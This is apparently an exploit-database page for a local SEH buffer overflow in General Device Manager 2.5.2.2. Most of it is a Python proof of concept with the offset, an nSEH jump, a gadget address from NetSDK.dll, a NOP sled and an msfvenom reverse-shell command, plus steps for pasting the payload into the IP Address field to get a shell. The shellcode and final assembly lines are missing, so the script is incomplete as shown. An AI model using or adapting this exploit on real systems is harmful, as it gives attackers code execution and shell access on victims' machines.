General device manager 2.5.2.2 buffer overflow (seh) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-07-31 |
Type : local |
Platform : windows
This exploit / vulnerability General device manager 2.5.2.2 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2:
https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit
# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3
import struct
offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90" # jmp short
seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
nops = b"\x90" * 32
#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
# write the final payload to a file
try:
with open('pwned.txt', 'wb') as f:
print("[+] Creating %s bytes evil payload..." %len(final_payload))
f.write(final_payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created!")
General device manager 2.5.2.2 buffer overflow (seh)